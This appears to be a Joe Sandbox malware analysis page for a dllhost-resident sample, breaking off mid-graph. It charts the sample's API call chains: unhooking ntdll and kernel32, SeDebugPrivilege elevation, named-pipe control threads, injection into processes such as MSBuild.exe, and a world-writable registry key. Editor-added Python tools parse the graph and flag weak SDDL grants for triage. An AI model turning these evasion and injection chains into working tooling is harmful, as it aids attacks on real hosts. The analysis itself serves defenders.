• 140002d38 → 140002d4c (entry): OpenMutexW → Sleep (looped until the mutex opens) → CloseHandle → 140002a0c ×2 (StrCpyW, StrCatW, GetModuleHandleW → GetCurrentProcess, K32GetModuleInformation → CreateFileW → CreateFileMappingW → MapViewOfFile → lstrcmpiA (looped over sections) → VirtualProtect, VirtualProtect → CloseHandle → CloseHandle → FreeLibrary; with the strings .text, C:\Windows\System32\, kernel32.dll and ntdll.dll below, this is consistent with mapping a clean on-disk copy of each module and overwriting the in-memory .text section) → GetCurrentProcessId, OpenProcess → OpenProcessToken → LookupPrivilegeValueW → AdjustTokenPrivileges → GetLastError → CloseHandle → RegOpenKeyExW → RegQueryValueExW → RegQueryValueExW → GetProcessHeap, HeapAlloc, GetProcessHeap, HeapAlloc, RegQueryValueExW → RegQueryValueExW → RegCloseKey, GetCurrentProcessId → 14000200c (GetProcessHeap, HeapAlloc → 140001cf0 (GetProcessHeap, HeapAlloc ×2, K32EnumProcesses → OpenProcess → K32EnumProcessModulesEx → ReadProcessMemory → CloseHandle → GetProcessHeap, HeapFree, GetProcessHeap, RtlFreeHeap) → OpenProcess → TerminateProcess, CloseHandle (looped) → GetProcessHeap, HeapFree). The remainder of 140002d4c is in the control-flow graph below.

• 140003728 (thread): 140002300 (AllocateAndInitializeSid → SetEntriesInAclW → LocalAlloc → InitializeSecurityDescriptor → SetSecurityDescriptorDacl → CreateNamedPipeW) → ConnectNamedPipe → ReadFile → WriteFile → DisconnectNamedPipe, looped, with Sleep on failure.

• 140003668 (thread): GetProcessHeap, HeapAlloc, GetProcessHeap, HeapAlloc → K32EnumProcesses → Sleep, looped.

• 140002cb0 (thread): 140002300 (6 API calls) → ConnectNamedPipe → ReadFile → DisconnectNamedPipe, looped, with Sleep on failure.
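The graph text above is the source of the rendered execution graph: each node is written as `id address [API ...]`, each `src->dst` token is an edge, and a label such as `2 API calls` stands for a collapsed sub-call rather than an API name. Reading call chains out of that by hand is error-prone, so the following added example (this editor's code, not Joe Sandbox's or the sample's) parses such a dump, lists the APIs reachable from a function node and checks a reachable-API signature against it. The sample input is an excerpt of the 140002434 subgraph copied from this report; the `HOLLOWING` signature is this example's own definition.

```python
"""Parse a Joe Sandbox execution-graph dump into per-function API chains.

Added example for this report page; not Joe Sandbox code. SAMPLE is an excerpt
copied from this report's execution_graph text (function 140002434 of the
dllhost memory dump). The signature definition below is this example's own.
"""
import re
from collections import defaultdict, deque
from dataclasses import dataclass, field

# Excerpt copied from the report (node id, address, optional API labels, then
# "src->dst" edges). 1400024ae is the unlabeled dispatcher block; 766->711 leads
# outside the excerpt, so node 711 is intentionally absent.
SAMPLE = """741 140002434 742 14000246f 741->742 766 140002726 741->766 744 1400020cc 2 API calls 742->744
765 1400024ae 742->765 742->766 743 1400024d7 CreateProcessW 743->765 744->765 745 1400028e1 OpenProcess
746 1400028f1 TerminateProcess 745->746 745->765 746->765 747 1400020cc GetModuleHandleA GetProcAddress
747->765 748 140002566 VirtualAllocEx 750 140002595 WriteProcessMemory 748->750 748->765 749 14000273f
VirtualAllocEx 751 14000276d WriteProcessMemory 749->751 749->765 752 1400025b7 VirtualProtectEx 750->752
750->765 753 14000278f VirtualProtectEx 751->753 751->765 752->765 753->765 754 140002858 VirtualAlloc
758 140002879 Wow64GetThreadContext 754->758 754->765 755 140002682 VirtualAlloc 757 1400026a7
GetThreadContext 755->757 755->765 756 1400027d0 WriteProcessMemory 756->765 760 1400026c4
WriteProcessMemory 757->760 757->765 761 140002891 WriteProcessMemory 758->761 758->765 759 1400025f9
WriteProcessMemory 759->765 762 1400026ef SetThreadContext 760->762 760->765 763 1400028b6
Wow64SetThreadContext 761->763 761->765 764 140002712 ResumeThread 762->764 762->765 763->765 764->765
764->766 765->743 765->745 765->747 765->748 765->749 765->754 765->755 765->756 765->759 765->766
767 140002643 VirtualProtectEx 765->767 768 14000281a VirtualProtectEx 765->768 766->711 767->765 768->765"""

EDGE = re.compile(r"^(\d+)->(\d+)$")
ADDR = re.compile(r"^[0-9a-fA-F]{6,16}$")  # image addresses; API names never match


@dataclass
class Node:
    nid: int
    addr: str
    label: str = ""

    @property
    def apis(self):
        # "N API calls" is Joe Sandbox's summary of a collapsed sub-call, not an API.
        if not self.label or self.label.endswith("API calls"):
            return []
        return self.label.split()


@dataclass
class Graph:
    nodes: dict = field(default_factory=dict)
    succ: dict = field(default_factory=lambda: defaultdict(list))


def parse_execution_graph(text):
    """Tokenise the dump: a node starts with a decimal id followed by an address,
    its label runs until the next node or edge token, edges are 'a->b'."""
    toks = text.split()
    if toks and toks[0] == "execution_graph":
        toks = toks[1:]

    def starts_node(k):
        return toks[k].isdigit() and k + 1 < len(toks) and ADDR.match(toks[k + 1])

    g, i = Graph(), 0
    while i < len(toks):
        m = EDGE.match(toks[i])
        if m:
            g.succ[int(m.group(1))].append(int(m.group(2)))
            i += 1
        elif starts_node(i):
            node = Node(int(toks[i]), toks[i + 1])
            i += 2
            words = []
            while i < len(toks) and not EDGE.match(toks[i]) and not starts_node(i):
                words.append(toks[i])
                i += 1
            node.label = " ".join(words)
            g.nodes[node.nid] = node
        else:
            raise ValueError(f"unexpected token {toks[i]!r} at position {i}")
    return g


def reachable(g, root):
    """Node ids reachable from root (inclusive); ids without a node record are
    edges into code outside the dump and simply carry no APIs."""
    seen, queue = {root}, deque([root])
    while queue:
        for s in g.succ.get(queue.popleft(), []):
            if s not in seen:
                seen.add(s)
                queue.append(s)
    return seen


def reachable_apis(g, root):
    return {a for n in reachable(g, root) if n in g.nodes for a in g.nodes[n].apis}


def api_chain(g, root):
    """Depth-first (address, [apis]) listing of labeled nodes under root."""
    out, seen, stack = [], set(), [root]
    while stack:
        n = stack.pop()
        if n in seen:
            continue
        seen.add(n)
        node = g.nodes.get(n)
        if node and node.apis:
            out.append((node.addr, node.apis))
        stack.extend(reversed(g.succ.get(n, [])))
    return out


# A signature is a list of alternative sets; every set must be hit by some
# reachable API. The Wow64 variants count the same as the native ones.
HOLLOWING = [{"CreateProcessW"}, {"VirtualAllocEx"}, {"WriteProcessMemory"},
             {"SetThreadContext", "Wow64SetThreadContext"}, {"ResumeThread"}]


def matches_signature(g, root, signature):
    apis = reachable_apis(g, root)
    return all(apis & alternatives for alternatives in signature)


if __name__ == "__main__":
    g = parse_execution_graph(SAMPLE)
    for addr, apis in api_chain(g, 741):
        print(addr, " ".join(apis))
    print("hollowing primitives reachable from 140002434:", matches_signature(g, 741, HOLLOWING))
```

Because 1400024ae is a dispatcher with edges back to every branch, almost any node in this subgraph reaches the whole primitive set; only a node whose successors lie outside the excerpt (766) reaches nothing. Run against the full `execution_graph` text, the same check over each root node gives a quick list of the functions carrying injection primitives.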

                                                                                                                                                          Callgraph

Control-flow Graph

Control-flow graph of 140002d4c (the rendered graph is not reproduced; basic blocks are listed in address order with their API calls and successors, and the executed/not-executed colouring is not recoverable from the text):

140002d4c-140002d5c → 140002d5e
140002d5e-140002d75 OpenMutexW → 140002d84 | 140002d77
140002d77-140002d82 Sleep → 140002d5e (mutex wait loop)
140002d84-140002dc1 CloseHandle, call 140002a0c ×2, GetCurrentProcessId, OpenProcess → 140002dc3 | 140002e39
140002dc3-140002dd7 OpenProcessToken → 140002dd9 | 140002e30
140002dd9-140002dee LookupPrivilegeValueW → 140002df0 | 140002e30
140002df0-140002e28 AdjustTokenPrivileges → 140002e2a | 140002e30
140002e2a GetLastError → 140002e30
140002e30-140002e33 CloseHandle → 140002e39
140002e39-140002e64 RegOpenKeyExW → 140002e6a | 1400031b3
140002e6a-140002e94 RegQueryValueExW → 140002e9a | 1400031b3
140002e9a-140002ec4 RegQueryValueExW → 140002eca | 1400031b3
140002eca-140002f36 GetProcessHeap, HeapAlloc, GetProcessHeap, HeapAlloc, RegQueryValueExW → 140002f3c | 1400031b3
140002f3c-140002f66 RegQueryValueExW → 140002f6c | 1400031b3
140002f6c-140002f7e RegCloseKey, GetCurrentProcessId, call 14000200c → 140002f83
140002f83-140002fba RegCreateKeyExW → 14000307d | 140002fc0
140002fc0-140002fe6 ConvertStringSecurityDescriptorToSecurityDescriptorW → 140003002 | 140002fe8
140002fe8-140002ffc RegSetKeySecurity, LocalFree → 140003002
140003002-14000303a RegCreateKeyExW → 140003073 | 14000303c
14000303c-14000306d GetCurrentProcessId, RegSetValueExW, RegCloseKey → 140003073
140003073-140003077 RegCloseKey → 14000307d
14000307d-140003111 CreateThread, GetProcessHeap, HeapAlloc, CreateThread ×2, call 14000151c → 140003113 | 140003145
140003113-140003143 ShellExecuteW → 140003113 (loop) | 140003145
140003145-1400031ad call 14000148c, call 1400011d4, call 14000148c ×3, call 1400011d4 ×3, GetProcessHeap, HeapFree, Sleep → 1400031b3
1400031b3-1400031c1 (function exit)
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
• Source File: 0000005F.00000002.2206797378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000005F.00000002.2206717829.0000000140000000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000005F.00000002.2206901922.0000000140004000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000005F.00000002.2207067074.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_95_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Process$Heap$CloseValue$CreateOpen$AllocQuery$CurrentHandleSecurityThread$DescriptorFreeSleepToken$AdjustConvertErrorExecuteLastLocalLookupMutexPrivilegePrivilegesShellStringTerminate
                                                                                                                                                          • String ID: $rbx-dll32$$rbx-dll64$?$D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$Global\Onimai_3637bd27-1800-4db6-94b5-e49ce9967b2d$SOFTWARE$SOFTWARE\$rbx-config$SeDebugPrivilege$kernel32.dll$ntdll.dll$open$pid$svc64
                                                                                                                                                          • API String ID: 2725631067-1382791509
                                                                                                                                                          • Opcode ID: 19d6d12776ca0f2fbbe8990d885d79cc61f5dade11bb5855dcfccad145e38bad
                                                                                                                                                          • Instruction ID: 11cca5996524c372b97bd826982d2baaf99c89fd62df68e9b01c6f7d22bdc91e
                                                                                                                                                          • Opcode Fuzzy Hash: 19d6d12776ca0f2fbbe8990d885d79cc61f5dade11bb5855dcfccad145e38bad
                                                                                                                                                          • Instruction Fuzzy Hash: 8DD1E0F6600A4086EB26DF22F8547DA27A5FB8CBD9F404116FB4A43A79DF38C589C744
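Among the strings of 140002d4c above is the SDDL string `D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)`. In the control-flow graph it is consumed by ConvertStringSecurityDescriptorToSecurityDescriptorW directly after RegCreateKeyExW and applied with RegSetKeySecurity, so it is the DACL the sample places on the registry key it creates. The following added example (this editor's code, not the sample's or Joe Sandbox's) decodes SDDL ACE strings and flags allow-ACEs that grant write-class rights to broad principals; `HARDENED_SDDL` is a constructed comparison string, not something found in the report.

```python
"""Decode an SDDL DACL string and flag over-broad allow ACEs.

Added example for this report page; not code from the sample or Joe Sandbox.
PAGE_SDDL is the string reported for function 140002d4c; HARDENED_SDDL is a
constructed comparison with the same administrators grant but read-only
access for Authenticated Users.
"""
import re
from dataclasses import dataclass

PAGE_SDDL = "D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)"
HARDENED_SDDL = "D:P(A;OICI;GA;;;SY)(A;OICI;GA;;;BA)(A;OICI;KR;;;AU)"  # constructed

ACE_TYPES = {"A": "ACCESS_ALLOWED", "D": "ACCESS_DENIED", "AU": "SYSTEM_AUDIT",
             "AL": "SYSTEM_ALARM", "OA": "OBJECT_ACCESS_ALLOWED", "OD": "OBJECT_ACCESS_DENIED"}
ACE_FLAGS = {"CI": "CONTAINER_INHERIT", "OI": "OBJECT_INHERIT", "NP": "NO_PROPAGATE_INHERIT",
             "IO": "INHERIT_ONLY", "ID": "INHERITED", "SA": "SUCCESSFUL_ACCESS", "FA": "FAILED_ACCESS"}
RIGHTS = {"GA": "GENERIC_ALL", "GR": "GENERIC_READ", "GW": "GENERIC_WRITE", "GX": "GENERIC_EXECUTE",
          "RC": "READ_CONTROL", "SD": "DELETE", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
          "KA": "KEY_ALL_ACCESS", "KR": "KEY_READ", "KW": "KEY_WRITE", "KX": "KEY_EXECUTE",
          "FA": "FILE_ALL_ACCESS", "FR": "FILE_GENERIC_READ", "FW": "FILE_GENERIC_WRITE",
          "FX": "FILE_GENERIC_EXECUTE"}
SIDS = {"AU": ("S-1-5-11", "Authenticated Users"), "BA": ("S-1-5-32-544", "Administrators"),
        "BU": ("S-1-5-32-545", "Users"), "SY": ("S-1-5-18", "Local System"),
        "WD": ("S-1-1-0", "Everyone"), "IU": ("S-1-5-4", "Interactive"),
        "AN": ("S-1-5-7", "Anonymous"), "CO": ("S-1-3-0", "Creator Owner"),
        "LS": ("S-1-5-19", "Local Service"), "NS": ("S-1-5-20", "Network Service")}
# Principals broad enough that a write-class grant to them is a weak ACL.
BROAD = {"S-1-1-0", "S-1-5-11", "S-1-5-32-545", "S-1-5-4", "S-1-5-7"}
WRITE_CLASS = {"GENERIC_ALL", "GENERIC_WRITE", "WRITE_DAC", "WRITE_OWNER", "DELETE",
               "KEY_ALL_ACCESS", "KEY_WRITE", "FILE_ALL_ACCESS", "FILE_GENERIC_WRITE"}


@dataclass
class Ace:
    ace_type: str
    flags: list
    rights: list
    sid: str
    principal: str


def _pairs(codes):
    """Two-letter SDDL codes are concatenated without separators: 'OICI' -> OI, CI."""
    if len(codes) % 2:
        raise ValueError(f"odd-length code string {codes!r}")
    return [codes[i:i + 2] for i in range(0, len(codes), 2)]


def parse_sddl_dacl(sddl):
    """Return the ACEs of the D: component; O:, G: and S: components are ignored."""
    m = re.search(r"D:(?P<control>[A-Z]*)(?P<aces>(?:\([^)]*\))+)", sddl)
    if not m:
        raise ValueError("no DACL component in SDDL string")
    aces = []
    for body in re.findall(r"\(([^)]*)\)", m.group("aces")):
        parts = body.split(";")
        if len(parts) != 6:
            raise ValueError(f"malformed ACE {body!r}")
        ace_type, flags, rights, _object_guid, _inherit_guid, sid = parts
        if rights.lower().startswith("0x"):
            rights_list = [rights]  # numeric access mask, left undecoded
        else:
            rights_list = [RIGHTS.get(c, f"UNKNOWN({c})") for c in _pairs(rights)]
        if sid.startswith("S-"):
            sid_str, name = sid, sid  # literal SID, no alias lookup
        else:
            sid_str, name = SIDS.get(sid, (sid, f"UNKNOWN({sid})"))
        aces.append(Ace(ACE_TYPES.get(ace_type, f"UNKNOWN({ace_type})"),
                        [ACE_FLAGS.get(c, f"UNKNOWN({c})") for c in _pairs(flags)],
                        rights_list, sid_str, name))
    return aces


def weak_aces(aces):
    """Allow ACEs that hand a write-class right to a broad principal."""
    return [a for a in aces
            if a.ace_type == "ACCESS_ALLOWED" and a.sid in BROAD and set(a.rights) & WRITE_CLASS]


def describe(aces):
    return [f"{a.ace_type}: {'|'.join(a.rights)} to {a.principal} ({a.sid}) flags={'|'.join(a.flags) or '-'}"
            for a in aces]


if __name__ == "__main__":
    for label, sddl in (("report", PAGE_SDDL), ("hardened (constructed)", HARDENED_SDDL)):
        aces = parse_sddl_dacl(sddl)
        print(label, sddl)
        for line in describe(aces):
            print("  ", line)
        print("   weak grants:", [a.principal for a in weak_aces(aces)] or "none")
```

For the report's string the decoder yields GENERIC_ALL for Authenticated Users (S-1-5-11) and for Administrators, with OI and CI so the grant inherits to everything created under the key: any authenticated user on the host can read, rewrite or delete that key and its subkeys, not just the elevated process that created it. The same `weak_aces` check is a reasonable triage filter for any SDDL string recovered from a sample.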

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
• Source File: 0000005F.00000002.2206797378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000005F.00000002.2206717829.0000000140000000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000005F.00000002.2206901922.0000000140004000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000005F.00000002.2207067074.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_95_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4084875642-0
                                                                                                                                                          • Opcode ID: 99f1e0b8495db7c7422e5633d2a2a6cdcfefacb08c3e4568b061437f40fd1713
                                                                                                                                                          • Instruction ID: 4f27d05859a20aa5d5a2c4d21673197ed0af44fd7722cf910b4e92e6674c13e6
                                                                                                                                                          • Opcode Fuzzy Hash: 99f1e0b8495db7c7422e5633d2a2a6cdcfefacb08c3e4568b061437f40fd1713
                                                                                                                                                          • Instruction Fuzzy Hash: AB5159B27116808AEB66DF63F8587EA22A1B78DBC4F844025EF5957764DF38C585C600

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
• Source File: 0000005F.00000002.2206797378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000005F.00000002.2206717829.0000000140000000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000005F.00000002.2206901922.0000000140004000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000005F.00000002.2207067074.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_95_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                                                                                                                                                          • String ID: .text$C:\Windows\System32\
                                                                                                                                                          • API String ID: 2721474350-832442975
                                                                                                                                                          • Opcode ID: 67dc4a1953bc74d66d77374d22a158681d99b3099cd4d4745ab806a1cba25056
                                                                                                                                                          • Instruction ID: a18771497a2cdddd7f649ca88061091fbee7acde65ae68025fcc699bdcbe0bdc
                                                                                                                                                          • Opcode Fuzzy Hash: 67dc4a1953bc74d66d77374d22a158681d99b3099cd4d4745ab806a1cba25056
                                                                                                                                                          • Instruction Fuzzy Hash: 89517BB270468086EB62DF16F9587DA73A1FB8CBD5F444525AF4A03BA8DF38C558C704

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
• Source File: 0000005F.00000002.2206797378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000005F.00000002.2206717829.0000000140000000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000005F.00000002.2206901922.0000000140004000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000005F.00000002.2207067074.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_95_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1323846700-0
                                                                                                                                                          • Opcode ID: 129a76087fcf8d85bc51ac130c76dfd69e86b58b274f62a94307b14953ecb4ac
                                                                                                                                                          • Instruction ID: 9fe7bf929bc7bac8d1627b31ede7e1d2709182ad911688bdebd710bde7565a1c
                                                                                                                                                          • Opcode Fuzzy Hash: 129a76087fcf8d85bc51ac130c76dfd69e86b58b274f62a94307b14953ecb4ac
                                                                                                                                                          • Instruction Fuzzy Hash: 78115EB1B0564086FB16DF27F84439A67A1AB8DBD4F488028FF0903776EE39C586C704

Control-flow Graph

Control-flow graph of 140002d38 (the rendered graph is not reproduced): 140002d38-140002d3c call 140002d4c → 140002d41-140002d43 ExitProcess.
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0000000140002D4C: OpenMutexW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D6C
• Part of subcall function 0000000140002D4C: Sleep.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D7C
• Part of subcall function 0000000140002D4C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D87
• Part of subcall function 0000000140002D4C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002DA5
• Part of subcall function 0000000140002D4C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002DB5
• Part of subcall function 0000000140002D4C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002DCF
• Part of subcall function 0000000140002D4C: LookupPrivilegeValueW.ADVAPI32 ref: 0000000140002DE6
• Part of subcall function 0000000140002D4C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002E20
• Part of subcall function 0000000140002D4C: GetLastError.KERNEL32 ref: 0000000140002E2A
• Part of subcall function 0000000140002D4C: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E33
• Part of subcall function 0000000140002D4C: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E5C
• Part of subcall function 0000000140002D4C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E8C
• Part of subcall function 0000000140002D4C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EBC
• Part of subcall function 0000000140002D4C: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002ED0
• Part of subcall function 0000000140002D4C: HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EDE
• Part of subcall function 0000000140002D4C: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EF1
• ExitProcess.KERNEL32 ref: 0000000140002D43
Memory Dump Source
• Source File: 0000005F.00000002.2206797378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000005F.00000002.2206717829.0000000140000000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000005F.00000002.2206901922.0000000140004000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000005F.00000002.2207067074.0000000140007000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_95_2_140000000_dllhost.jbxd
Similarity
• API ID: Process$Open$HeapValue$CloseHandleQueryToken$AdjustAllocCurrentErrorExitLastLookupMutexPrivilegePrivilegesSleep
• String ID:
• API String ID: 3805535264-0
• Opcode ID: 79b4bc089e26725b3875790e3276540c07806726462858758fa47b4ded48d988
• Instruction ID: 466ff6e6ce30b805044d1f2dc35dca8baccd3c328fc793c3ea1e6e53ebee4899
• Opcode Fuzzy Hash: 79b4bc089e26725b3875790e3276540c07806726462858758fa47b4ded48d988
• Instruction Fuzzy Hash: 15A002F0F2258083EB0AB7B7B85A3DD25B1ABAC781F100416B2024B2B3DE3C48954759

Control-flow Graph
                                                                                                                                                          control_flow_graph 95 140001868-1400018aa OpenProcess 96 140001cd1-140001ced 95->96 97 1400018b0-1400018c5 IsWow64Process 95->97 98 1400018d5 97->98 99 1400018c7-1400018d3 97->99 100 1400018db-1400018e7 CloseHandle 98->100 99->100 100->96 101 1400018ed-1400018f8 100->101 101->96 102 1400018fe-140001913 101->102 103 140001925 102->103 104 140001915-14000191a 102->104 106 140001927-140001929 103->106 104->96 105 140001920-140001923 104->105 105->106 106->96 107 14000192f-140001945 OpenProcess 106->107 107->96 108 14000194b-140001964 OpenProcess 107->108 109 140001a04-140001a23 NtQueryInformationProcess 108->109 110 14000196a-140001981 K32GetModuleFileNameExW 108->110 113 140001cc8-140001ccb CloseHandle 109->113 114 140001a29-140001a2d 109->114 111 1400019b3-1400019bf CloseHandle 110->111 112 140001983-14000199e PathFindFileNameW lstrlenW 110->112 111->109 116 1400019c1-1400019db 111->116 112->111 115 1400019a0-1400019b0 StrCpyW 112->115 113->96 114->113 117 140001a33-140001a4b OpenProcessToken 114->117 115->111 118 1400019e0-1400019f2 StrCmpIW 116->118 117->113 119 140001a51-140001a77 GetTokenInformation 117->119 118->113 120 1400019f8-140001a02 118->120 121 140001af4 119->121 122 140001a79-140001a82 GetLastError 119->122 120->109 120->118 123 140001afb-140001b09 CloseHandle 121->123 122->121 124 140001a84-140001a98 LocalAlloc 122->124 123->113 125 140001b0f-140001b16 123->125 124->121 126 140001a9a-140001ac0 GetTokenInformation 124->126 125->113 127 140001b1c-140001b27 125->127 128 140001ae2 126->128 129 140001ac2-140001ae0 GetSidSubAuthorityCount GetSidSubAuthority 126->129 127->113 130 140001b2d-140001b37 127->130 131 140001ae9-140001af2 LocalFree 128->131 129->131 132 140001b52 130->132 133 140001b39-140001b43 130->133 131->123 135 140001b56-140001b8e call 1400029a4 * 3 132->135 133->113 134 140001b49-140001b50 
133->134 134->135 135->113 142 140001b94-140001bb4 call 1400029a4 StrStrA 135->142 145 140001bb6-140001bc6 142->145 146 140001bcd-140001bf2 call 1400029a4 * 2 142->146 145->142 147 140001bc8 145->147 146->113 152 140001bf8-140001c21 VirtualAllocEx 146->152 147->113 152->113 153 140001c27-140001c40 WriteProcessMemory 152->153 153->113 154 140001c46-140001c68 call 140002bfc 153->154 154->113 157 140001c6a-140001c72 154->157 157->113 158 140001c74-140001c81 WaitForSingleObject 157->158 159 140001c83-140001c97 GetExitCodeThread 158->159 160 140001cbd-140001cc2 CloseHandle 158->160 161 140001ca2-140001cbb VirtualFreeEx 159->161 162 140001c99-140001c9f 159->162 160->113 161->160 162->161
Memory Dump Source
• Source File: 0000005F.00000002.2206797378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000005F.00000002.2206717829.0000000140000000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000005F.00000002.2206901922.0000000140004000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000005F.00000002.2207067074.0000000140007000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_95_2_140000000_dllhost.jbxd
Similarity
• API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileFreeLocalNameVirtual$CodeCountErrorExitFindLastMemoryModuleObjectPathQuerySingleThreadWaitWow64Writelstrlen
• String ID: @$MSBuild.exe$MsMpEng.exe$ReflectiveDllMain
• API String ID: 2456419452-2628171563
• Opcode ID: 2d2d9d352461c9b57aa585ec06d48b5b40d6395f47d72d8764cd192164728847
• Instruction ID: 2a11411cfc832b8c6424502e8b4f1e91c9a7b64b89c06221b22f1678334b3336
• Opcode Fuzzy Hash: 2d2d9d352461c9b57aa585ec06d48b5b40d6395f47d72d8764cd192164728847
• Instruction Fuzzy Hash: E6C15BB1700A8186EB66DF23B8907EA27A5FB8CBC4F444125EF4A477A5EF38C945C740

Control-flow Graph
                                                                                                                                                          control_flow_graph 214 140003204-140003225 215 14000322b 214->215 216 14000341d-140003423 214->216 217 140003231-140003237 215->217 218 14000338b-1400033c3 GetProcessHeap HeapAlloc K32EnumProcesses 215->218 219 140003599-1400035bd ReadFile 216->219 220 140003429-14000342c 216->220 223 140003382-140003384 ExitProcess 217->223 224 14000323d-140003240 217->224 221 140003652-140003664 218->221 222 1400033c9-1400033da 218->222 219->221 225 1400035c3-1400035ca 219->225 226 140003432-140003438 220->226 227 14000358f-140003594 call 140001f7c 220->227 222->221 228 1400033e0-140003416 call 140001868 * 2 222->228 230 140003246-140003249 224->230 231 1400032ea-140003315 RegOpenKeyExW 224->231 225->221 232 1400035d0-14000360b GetProcessHeap HeapAlloc call 140001cf0 225->232 233 140003534-140003547 call 1400020fc 226->233 234 14000343e-140003441 226->234 227->221 271 140003418 228->271 239 1400032db-1400032e5 230->239 240 14000324f-140003252 230->240 236 140003353-14000337d call 14000217c * 2 call 140001f7c call 1400017a8 call 14000200c 231->236 237 140003317-14000334d RegDeleteValueW * 3 231->237 257 14000360d-140003613 232->257 258 14000363e-14000364c GetProcessHeap HeapFree 232->258 233->221 260 14000354d-14000355c call 1400020fc 233->260 242 140003443-140003449 234->242 243 140003480-140003491 call 1400020fc 234->243 236->221 237->236 239->221 248 140003254-14000325a 240->248 249 1400032ce-1400032d6 240->249 242->221 251 14000344f-140003479 call 140002c5c call 140002c88 ExitProcess 242->251 243->221 262 140003497-1400034b9 ReadFile 243->262 248->221 256 140003260-140003284 ReadFile 248->256 249->221 256->221 265 14000328a-140003291 256->265 257->258 266 140003615-140003627 257->266 258->221 260->221 277 140003562-14000358a ShellExecuteW 260->277 262->221 270 1400034bf-1400034c6 262->270 265->221 273 140003297-1400032c9 call 
